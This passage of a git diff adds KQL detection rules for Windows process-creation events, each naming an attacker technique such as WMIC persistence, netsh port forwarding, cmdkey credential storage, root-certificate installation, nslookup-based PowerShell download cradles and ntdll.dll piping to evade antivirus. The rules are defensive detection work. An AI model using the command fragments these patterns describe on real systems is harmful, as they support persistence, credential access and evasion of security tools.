+DeviceProcessEvents
+| where ProcessCommandLine contains "nslookup" and ProcessCommandLine contains "_ldap._tcp.dc._msdcs."
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/new_activescripteventconsumer_created_via_wmic_exe.kql b/KQL/rules/windows/process_creation/new_activescripteventconsumer_created_via_wmic_exe.kql
new file mode 100644
index 00000000..91e403ac
--- /dev/null
+++ b/KQL/rules/windows/process_creation/new_activescripteventconsumer_created_via_wmic_exe.kql
@@ -0,0 +1,12 @@
+// Title: New ActiveScriptEventConsumer Created Via Wmic.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-06-25
+// Level: high
+// Description: Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.003
+// False Positives:
+//   - Legitimate software creating script event consumers
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "ActiveScriptEventConsumer" and ProcessCommandLine contains " CREATE "
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/new_capture_session_launched_via_dxcap_exe.kql b/KQL/rules/windows/process_creation/new_capture_session_launched_via_dxcap_exe.kql
new file mode 100644
index 00000000..c5279971
--- /dev/null
+++ b/KQL/rules/windows/process_creation/new_capture_session_launched_via_dxcap_exe.kql
@@ -0,0 +1,12 @@
+// Title: New Capture Session Launched Via DXCap.EXE
+// Author: Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-10-26
+// Level: medium
+// Description: Detects the execution of "DXCap.EXE" with the "-c" flag, which allows a user to launch any arbitrary binary or windows package through DXCap itself. This can be abused to potentially bypass application whitelisting.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+//   - Legitimate execution of dxcap.exe by legitimate user
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -c " and (FolderPath endswith "\\DXCap.exe" or ProcessVersionInfoOriginalFileName =~ "DXCap.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/new_dll_registered_via_odbcconf_exe.kql b/KQL/rules/windows/process_creation/new_dll_registered_via_odbcconf_exe.kql
new file mode 100644
index 00000000..484f57b8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/new_dll_registered_via_odbcconf_exe.kql
@@ -0,0 +1,12 @@
+// Title: New DLL Registered Via Odbcconf.EXE
+// Author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-22
+// Level: medium
+// Description: Detects execution of "odbcconf" with "REGSVR" in order to register a new DLL (equivalent to running regsvr32). Attackers abuse this to install and run malicious DLLs.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.008
+// False Positives:
+//   - Legitimate DLLs being registered via "odbcconf" will generate false positives. Investigate the path of the DLL and its content to determine if the action is authorized.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "REGSVR " and ProcessCommandLine contains ".dll") and (FolderPath endswith "\\odbcconf.exe" or ProcessVersionInfoOriginalFileName =~ "odbcconf.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/new_dns_serverlevelplugindll_installed_via_dnscmd_exe.kql b/KQL/rules/windows/process_creation/new_dns_serverlevelplugindll_installed_via_dnscmd_exe.kql
new file mode 100644
index 00000000..b304067c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/new_dns_serverlevelplugindll_installed_via_dnscmd_exe.kql
@@ -0,0 +1,10 @@
+// Title: New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-05-08
+// Level: high
+// Description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.t1112
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/config" and ProcessCommandLine contains "/serverlevelplugindll") and FolderPath endswith "\\dnscmd.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/new_firewall_rule_added_via_netsh_exe.kql b/KQL/rules/windows/process_creation/new_firewall_rule_added_via_netsh_exe.kql
new file mode 100644
index 00000000..1209e1c5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/new_firewall_rule_added_via_netsh_exe.kql
@@ -0,0 +1,13 @@
+// Title: New Firewall Rule Added Via Netsh.EXE
+// Author: Markus Neis, Sander Wiebing
+// Date: 2019-01-29
+// Level: medium
+// Description: Detects the addition of a new rule to the Windows firewall via netsh
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.004, attack.s0246
+// False Positives:
+//   - Legitimate administration activity
+//   - Software installations
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " firewall " and ProcessCommandLine contains " add ") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")) and (not(((ProcessCommandLine contains "advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=" and ProcessCommandLine contains ":\\Program Files (x86)\\Dropbox\\Client\\Dropbox.exe\" enable=yes profile=Any") or (ProcessCommandLine contains "advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=" and ProcessCommandLine contains ":\\Program Files\\Dropbox\\Client\\Dropbox.exe\" enable=yes profile=Any"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/new_generic_credentials_added_via_cmdkey_exe.kql b/KQL/rules/windows/process_creation/new_generic_credentials_added_via_cmdkey_exe.kql
new file mode 100644
index 00000000..7f104c2a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/new_generic_credentials_added_via_cmdkey_exe.kql
@@ -0,0 +1,13 @@
+// Title: New Generic Credentials Added Via Cmdkey.EXE
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-03
+// Level: medium
+// Description: Detects usage of "cmdkey.exe" to add generic credentials.
+// As an example, this can be used before connecting to an RDP session via command line interface.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.005
+// False Positives:
+//   - Legitimate usage for administration purposes
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -g" or ProcessCommandLine contains " /g" or ProcessCommandLine contains " –g" or ProcessCommandLine contains " —g" or ProcessCommandLine contains " ―g") and (ProcessCommandLine contains " -p" or ProcessCommandLine contains " /p" or ProcessCommandLine contains " –p" or ProcessCommandLine contains " —p" or ProcessCommandLine contains " ―p") and (ProcessCommandLine contains " -u" or ProcessCommandLine contains " /u" or ProcessCommandLine contains " –u" or ProcessCommandLine contains " —u" or ProcessCommandLine contains " ―u") and (FolderPath endswith "\\cmdkey.exe" or ProcessVersionInfoOriginalFileName =~ "cmdkey.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/new_kernel_driver_via_sc_exe.kql b/KQL/rules/windows/process_creation/new_kernel_driver_via_sc_exe.kql
new file mode 100644
index 00000000..8d69c498
--- /dev/null
+++ b/KQL/rules/windows/process_creation/new_kernel_driver_via_sc_exe.kql
@@ -0,0 +1,12 @@
+// Title: New Kernel Driver Via SC.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-14
+// Level: medium
+// Description: Detects creation of a new service (kernel driver) with the type "kernel"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003
+// False Positives:
+//   - Rare legitimate installation of kernel drivers via sc.exe
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "create" or ProcessCommandLine contains "config") and (ProcessCommandLine contains "binPath" and ProcessCommandLine contains "type" and ProcessCommandLine contains "kernel") and FolderPath endswith "\\sc.exe") and (not(((ProcessCommandLine contains "create netprotection_network_filter" and ProcessCommandLine contains "type= kernel start= " and ProcessCommandLine contains "binPath= System32\\drivers\\netprotection_network_filter" and ProcessCommandLine contains "DisplayName= netprotection_network_filter" and ProcessCommandLine contains "group= PNP_TDI tag= yes") or (ProcessCommandLine contains "create avelam binpath=C:\\Windows\\system32\\drivers\\avelam.sys" and ProcessCommandLine contains "type=kernel start=boot error=critical group=Early-Launch"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/new_network_trace_capture_started_via_netsh_exe.kql b/KQL/rules/windows/process_creation/new_network_trace_capture_started_via_netsh_exe.kql
new file mode 100644
index 00000000..95fb2310
--- /dev/null
+++ b/KQL/rules/windows/process_creation/new_network_trace_capture_started_via_netsh_exe.kql
@@ -0,0 +1,12 @@
+// Title: New Network Trace Capture Started Via Netsh.EXE
+// Author: Kutepov Anton, oscd.community
+// Date: 2019-10-24
+// Level: medium
+// Description: Detects the execution of netsh with the "trace" flag in order to start a network capture
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.credential-access, attack.t1040
+// False Positives:
+//   - Legitimate administration activity
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "trace" and ProcessCommandLine contains "start") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/new_port_forwarding_rule_added_via_netsh_exe.kql b/KQL/rules/windows/process_creation/new_port_forwarding_rule_added_via_netsh_exe.kql
new file mode 100644
index 00000000..60d05d82
--- /dev/null
+++ b/KQL/rules/windows/process_creation/new_port_forwarding_rule_added_via_netsh_exe.kql
@@ -0,0 +1,13 @@
+// Title: New Port Forwarding Rule Added Via Netsh.EXE
+// Author: Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan Poudel
+// Date: 2019-01-29
+// Level: medium
+// Description: Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.defense-evasion, attack.command-and-control, attack.t1090
+// False Positives:
+//   - Legitimate administration activity
+//   - WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") and ((ProcessCommandLine contains "interface" and ProcessCommandLine contains "portproxy" and ProcessCommandLine contains "add" and ProcessCommandLine contains "v4tov4") or (ProcessCommandLine contains "i " and ProcessCommandLine contains "p " and ProcessCommandLine contains "a " and ProcessCommandLine contains "v ") or (ProcessCommandLine contains "connectp" and ProcessCommandLine contains "listena" and ProcessCommandLine contains "c="))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/new_process_created_via_taskmgr_exe.kql b/KQL/rules/windows/process_creation/new_process_created_via_taskmgr_exe.kql
new file mode 100644
index 00000000..20e8ce7a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/new_process_created_via_taskmgr_exe.kql
@@ -0,0 +1,12 @@
+// Title: New Process Created Via Taskmgr.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-03-13
+// Level: low
+// Description: Detects the creation of a process via the Windows task manager. This might be an attempt to bypass UAC
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+// False Positives:
+//   - Administrative activity
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\taskmgr.exe" and (not((FolderPath endswith ":\\Windows\\System32\\mmc.exe" or FolderPath endswith ":\\Windows\\System32\\resmon.exe" or FolderPath endswith ":\\Windows\\System32\\Taskmgr.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/new_process_created_via_wmic_exe.kql b/KQL/rules/windows/process_creation/new_process_created_via_wmic_exe.kql
new file mode 100644
index 00000000..44fb1394
--- /dev/null
+++ b/KQL/rules/windows/process_creation/new_process_created_via_wmic_exe.kql
@@ -0,0 +1,10 @@
+// Title: New Process Created Via Wmic.EXE
+// Author: Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects new process creation using WMIC via the "process call create" flag
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047, car.2016-03-002
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "process" and ProcessCommandLine contains "call" and ProcessCommandLine contains "create") and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/new_remote_desktop_connection_initiated_via_mstsc_exe.kql b/KQL/rules/windows/process_creation/new_remote_desktop_connection_initiated_via_mstsc_exe.kql
new file mode 100644
index 00000000..2e236fde
--- /dev/null
+++ b/KQL/rules/windows/process_creation/new_remote_desktop_connection_initiated_via_mstsc_exe.kql
@@ -0,0 +1,13 @@
+// Title: New Remote Desktop Connection Initiated Via Mstsc.EXE
+// Author: frack113
+// Date: 2022-01-07
+// Level: medium
+// Description: Detects the usage of "mstsc.exe" with the "/v" flag to initiate a connection to a remote server.
+// Adversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.001
+// False Positives:
+//   - WSL (Windows Sub System For Linux)
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -v:" or ProcessCommandLine contains " /v:" or ProcessCommandLine contains " –v:" or ProcessCommandLine contains " —v:" or ProcessCommandLine contains " ―v:") and (FolderPath endswith "\\mstsc.exe" or ProcessVersionInfoOriginalFileName =~ "mstsc.exe")) and (not((ProcessCommandLine contains "C:\\ProgramData\\Microsoft\\WSL\\wslg.rdp" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\lxss\\wslhost.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/new_root_certificate_installed_via_certmgr_exe.kql b/KQL/rules/windows/process_creation/new_root_certificate_installed_via_certmgr_exe.kql
new file mode 100644
index 00000000..5a001200
--- /dev/null
+++ b/KQL/rules/windows/process_creation/new_root_certificate_installed_via_certmgr_exe.kql
@@ -0,0 +1,13 @@
+// Title: New Root Certificate Installed Via CertMgr.EXE
+// Author: oscd.community, @redcanary, Zach Stanford @svch0st
+// Date: 2023-03-05
+// Level: medium
+// Description: Detects execution of "certmgr" with the "add" flag in order to install a new certificate on the system.
+// Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1553.004
+// False Positives:
+//   - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/add" and ProcessCommandLine contains "root") and (FolderPath endswith "\\CertMgr.exe" or ProcessVersionInfoOriginalFileName =~ "CERTMGT.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/new_root_certificate_installed_via_certutil_exe.kql b/KQL/rules/windows/process_creation/new_root_certificate_installed_via_certutil_exe.kql
new file mode 100644
index 00000000..4835d8e4
--- /dev/null
+++ b/KQL/rules/windows/process_creation/new_root_certificate_installed_via_certutil_exe.kql
@@ -0,0 +1,13 @@
+// Title: New Root Certificate Installed Via Certutil.EXE
+// Author: oscd.community, @redcanary, Zach Stanford @svch0st
+// Date: 2023-03-05
+// Level: medium
+// Description: Detects execution of "certutil" with the "addstore" flag in order to install a new certificate on the system.
+// Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1553.004
+// False Positives:
+//   - Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-addstore" or ProcessCommandLine contains "/addstore" or ProcessCommandLine contains "–addstore" or ProcessCommandLine contains "—addstore" or ProcessCommandLine contains "―addstore") and ProcessCommandLine contains "root" and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/new_service_creation_using_powershell.kql b/KQL/rules/windows/process_creation/new_service_creation_using_powershell.kql
new file mode 100644
index 00000000..29a821f6
--- /dev/null
+++ b/KQL/rules/windows/process_creation/new_service_creation_using_powershell.kql
@@ -0,0 +1,13 @@
+// Title: New Service Creation Using PowerShell
+// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
+// Date: 2023-02-20
+// Level: low
+// Description: Detects the creation of a new service using powershell.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003
+// False Positives:
+//   - Legitimate administrator or user creates a service for legitimate reasons.
+//   - Software installation
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "New-Service" and ProcessCommandLine contains "-BinaryPathName"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/new_service_creation_using_sc_exe.kql b/KQL/rules/windows/process_creation/new_service_creation_using_sc_exe.kql
new file mode 100644
index 00000000..d92b8c78
--- /dev/null
+++ b/KQL/rules/windows/process_creation/new_service_creation_using_sc_exe.kql
@@ -0,0 +1,13 @@
+// Title: New Service Creation Using Sc.EXE
+// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
+// Date: 2023-02-20
+// Level: low
+// Description: Detects the creation of a new service using the "sc.exe" utility.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003
+// False Positives:
+//   - Legitimate administrator or user creates a service for legitimate reasons.
+//   - Software installation
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "create" and ProcessCommandLine contains "binPath") and FolderPath endswith "\\sc.exe") and (not((InitiatingProcessFolderPath endswith "\\Dropbox.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Dropbox\\Client\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Dropbox\\Client\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/new_user_created_via_net_exe.kql b/KQL/rules/windows/process_creation/new_user_created_via_net_exe.kql
new file mode 100644
index 00000000..12efcded
--- /dev/null
+++ b/KQL/rules/windows/process_creation/new_user_created_via_net_exe.kql
@@ -0,0 +1,13 @@
+// Title: New User Created Via Net.EXE
+// Author: Endgame, JHasenbusch (adapted to Sigma for oscd.community)
+// Date: 2018-10-30
+// Level: medium
+// Description: Identifies the creation of local users via the net.exe command.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1136.001
+// False Positives:
+//   - Legitimate user creation.
+//   - Better use event IDs for user creation rather than command line rules.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "user" and ProcessCommandLine contains "add") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/new_user_created_via_net_exe_with_never_expire_option.kql b/KQL/rules/windows/process_creation/new_user_created_via_net_exe_with_never_expire_option.kql
new file mode 100644
index 00000000..ca433ac1
--- /dev/null
+++ b/KQL/rules/windows/process_creation/new_user_created_via_net_exe_with_never_expire_option.kql
@@ -0,0 +1,12 @@
+// Title: New User Created Via Net.EXE With Never Expire Option
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-12
+// Level: high
+// Description: Detects creation of local users via the net.exe command with the option "never expire"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1136.001
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "user" and ProcessCommandLine contains "add" and ProcessCommandLine contains "expires:never") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/new_virtual_smart_card_created_via_tpmvscmgr_exe.kql b/KQL/rules/windows/process_creation/new_virtual_smart_card_created_via_tpmvscmgr_exe.kql
new file mode 100644
index 00000000..cdae2f59
--- /dev/null
+++ b/KQL/rules/windows/process_creation/new_virtual_smart_card_created_via_tpmvscmgr_exe.kql
@@ -0,0 +1,12 @@
+// Title: New Virtual Smart Card Created Via TpmVscMgr.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-15
+// Level: medium
+// Description: Detects execution of "Tpmvscmgr.exe" to create a new virtual smart card.
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+//   - Legitimate usage by an administrator
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "create" and (FolderPath endswith "\\tpmvscmgr.exe" and ProcessVersionInfoOriginalFileName =~ "TpmVscMgr.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/nltest_exe_execution.kql b/KQL/rules/windows/process_creation/nltest_exe_execution.kql
new file mode 100644
index 00000000..2f4f7e57
--- /dev/null
+++ b/KQL/rules/windows/process_creation/nltest_exe_execution.kql
@@ -0,0 +1,12 @@
+// Title: Nltest.EXE Execution
+// Author: Arun Chauhan
+// Date: 2023-02-03
+// Level: low
+// Description: Detects nltest commands that can be used for information discovery
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1016, attack.t1018, attack.t1482
+// False Positives:
+//   - Legitimate administration activity
+
+DeviceProcessEvents
+| where FolderPath endswith "\\nltest.exe" or ProcessVersionInfoOriginalFileName =~ "nltestrk.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/node_process_executions.kql b/KQL/rules/windows/process_creation/node_process_executions.kql
new file mode 100644
index 00000000..0d7faa39
--- /dev/null
+++ b/KQL/rules/windows/process_creation/node_process_executions.kql
@@ -0,0 +1,10 @@
+// Title: Node Process Executions
+// Author: Max Altgelt (Nextron Systems)
+// Date: 2022-04-06
+// Level: medium
+// Description: Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1127, attack.t1059.007
+
+DeviceProcessEvents
+| where FolderPath endswith "\\Adobe Creative Cloud Experience\\libs\\node.exe" and (not(ProcessCommandLine contains "Adobe Creative Cloud Experience\\js"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/nodejs_execution_of_javascript_file.kql b/KQL/rules/windows/process_creation/nodejs_execution_of_javascript_file.kql
new file mode 100644
index 00000000..589c7d9f
--- /dev/null
+++ b/KQL/rules/windows/process_creation/nodejs_execution_of_javascript_file.kql
@@ -0,0 +1,15 @@
+// Title: NodeJS Execution of JavaScript File
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-04-21
+// Level: low
+// Description: Detects execution of JavaScript or JSC files using NodeJs binary node.exe, that could be potentially suspicious.
+// Node.js is a popular open-source JavaScript runtime that runs code outside browsers and is widely used for both frontend and backend development.
+// Adversaries have been observed abusing Node.js to disguise malware as legitimate processes, evade security defenses, and maintain persistence within target systems.
+// Because Node.js is commonly used, this rule may generate false positives in some environments. However, if such activity is unusual in your environment, it is highly suspicious and warrants immediate investigation.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.007
+// False Positives:
+//   - Legitimate use of node.exe to execute JavaScript or JSC files on your environment
+
+DeviceProcessEvents
+| where ProcessCommandLine contains ".js" and (FolderPath endswith "\\node.exe" or ProcessVersionInfoOriginalFileName =~ "node.exe" or ProcessVersionInfoProductName =~ "Node.js")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/non_interactive_powershell_process_spawned.kql b/KQL/rules/windows/process_creation/non_interactive_powershell_process_spawned.kql
new file mode 100644
index 00000000..c25b5fad
--- /dev/null
+++ b/KQL/rules/windows/process_creation/non_interactive_powershell_process_spawned.kql
@@ -0,0 +1,12 @@
+// Title: Non Interactive PowerShell Process Spawned
+// Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
+// Date: 2019-09-12
+// Level: low
+// Description: Detects non-interactive PowerShell activity by looking at the "powershell" process with a non-user GUI process such as "explorer.exe" as a parent.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001
+// False Positives:
+//   - Likely. Many admin scripts and tools leverage PowerShell in their BAT or VB scripts which may trigger this rule often. It is best to add additional filters or use this to hunt for anomalies
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (not(((InitiatingProcessFolderPath endswith ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\CompatTelRunner.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\explorer.exe") or InitiatingProcessFolderPath =~ ":\\$WINDOWS.~BT\\Sources\\SetupHost.exe"))) and (not(((InitiatingProcessFolderPath contains ":\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_" and InitiatingProcessFolderPath endswith "\\WindowsTerminal.exe") or (InitiatingProcessCommandLine contains " --ms-enable-electron-run-as-node " and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/non_privileged_usage_of_reg_or_powershell.kql b/KQL/rules/windows/process_creation/non_privileged_usage_of_reg_or_powershell.kql
new file mode 100644
index 00000000..9c99873a
--- /dev/null
+++ b/KQL/rules/windows/process_creation/non_privileged_usage_of_reg_or_powershell.kql
@@ -0,0 +1,10 @@
+// Title: Non-privileged Usage of Reg or Powershell
+// Author: Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community
+// Date: 2020-10-05
+// Level: high
+// Description: Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "reg " and ProcessCommandLine contains "add") or (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "set-itemproperty" or ProcessCommandLine contains " sp " or ProcessCommandLine contains "new-itemproperty")) and ((ProcessCommandLine contains "ImagePath" or ProcessCommandLine contains "FailureCommand" or ProcessCommandLine contains "ServiceDLL") and (ProcessCommandLine contains "ControlSet" and ProcessCommandLine contains "Services") and (ProcessIntegrityLevel in~ ("Medium", "S-1-16-8192")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/notepad_password_files_discovery.kql b/KQL/rules/windows/process_creation/notepad_password_files_discovery.kql
new file mode 100644
index 00000000..ea16fd51
--- /dev/null
+++ b/KQL/rules/windows/process_creation/notepad_password_files_discovery.kql
@@ -0,0 +1,12 @@
+// Title: Notepad Password Files Discovery
+// Author: The DFIR Report
+// Date: 2025-02-21
+// Level: low
+// Description: Detects the execution of Notepad to open a file that has the string "password" which may indicate unauthorized access to credentials or suspicious activity.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+// False Positives:
+//   - Legitimate use of opening files from remote hosts by administrators or users. However, storing passwords in text readable format could potentially be a violation of the organization's policy. Any match should be investigated further.
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "password" and ProcessCommandLine contains ".txt") or (ProcessCommandLine contains "password" and ProcessCommandLine contains ".csv") or (ProcessCommandLine contains "password" and ProcessCommandLine contains ".doc") or (ProcessCommandLine contains "password" and ProcessCommandLine contains ".xls")) and FolderPath endswith "\\notepad.exe" and InitiatingProcessFolderPath endswith "\\explorer.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/nslookup_powershell_download_cradle_processcreation.kql b/KQL/rules/windows/process_creation/nslookup_powershell_download_cradle_processcreation.kql
new file mode 100644
index 00000000..dfd8fdbb
--- /dev/null
+++ b/KQL/rules/windows/process_creation/nslookup_powershell_download_cradle_processcreation.kql
@@ -0,0 +1,10 @@
+// Title: Nslookup PowerShell Download Cradle - ProcessCreation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-05
+// Level: medium
+// Description: Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -q=txt " or ProcessCommandLine contains " -querytype=txt ") and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) and (FolderPath contains "\\nslookup.exe" or ProcessVersionInfoOriginalFileName =~ "\\nslookup.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/ntdllpipe_like_activity_execution.kql b/KQL/rules/windows/process_creation/ntdllpipe_like_activity_execution.kql
new file mode 100644
index 00000000..de464966
--- /dev/null
+++ b/KQL/rules/windows/process_creation/ntdllpipe_like_activity_execution.kql
@@ -0,0 +1,10 @@
+// Title: NtdllPipe Like Activity Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-03-05
+// Level: high
+// Description: Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "type %windir%\\system32\\ntdll.dll" or ProcessCommandLine contains "type %systemroot%\\system32\\ntdll.dll" or ProcessCommandLine contains "type c:\\windows\\system32\\ntdll.dll" or ProcessCommandLine contains "\\ntdll.dll > \\\\.\\pipe\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/obfuscated_ip_download_activity.kql b/KQL/rules/windows/process_creation/obfuscated_ip_download_activity.kql
new file mode 100644
index 00000000..0301a460
--- /dev/null
+++ b/KQL/rules/windows/process_creation/obfuscated_ip_download_activity.kql
@@ -0,0 +1,10 @@
